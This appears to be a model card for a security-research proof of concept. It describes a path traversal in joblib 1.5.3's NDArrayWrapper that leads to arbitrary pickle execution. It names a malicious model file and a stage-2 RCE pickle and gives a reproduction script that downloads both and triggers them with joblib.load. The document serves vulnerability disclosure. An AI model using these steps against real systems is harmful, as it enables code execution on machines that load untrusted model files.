--- license: mit tags: - security - poc --- # joblib NDArrayWrapper Path Traversal PoC Security research PoC for huntr MFV submission. **Vulnerability:** `NDArrayWrapper.read()` in `joblib/numpy_pickle_compat.py` uses an unsanitized `self.filename` field (from inside the pickle) in `os.path.join()`, then calls `numpy.load(filename, allow_pickle=True)` — enabling path traversal to arbitrary pickle execution. **Affected version:** joblib 1.5.3 (latest) ## Files - `evil.joblib` — malicious model file (NDArrayWrapper with `filename="../payload.npy"`) - `payload.npy` — stage-2 RCE pickle (place one directory above evil.joblib) ## Reproduction ```bash pip3 install joblib==1.5.3 numpy python3 -c " import os, joblib from huggingface_hub import hf_hub_download os.makedirs('/tmp/poc_model', exist_ok=True) hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'payload.npy', local_dir='/tmp') hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'evil.joblib', local_dir='/tmp/poc_model') try: joblib.load('/tmp/poc_model/evil.joblib') except: pass print(open('/tmp/jl_rce_proof.txt').read().strip()) " ```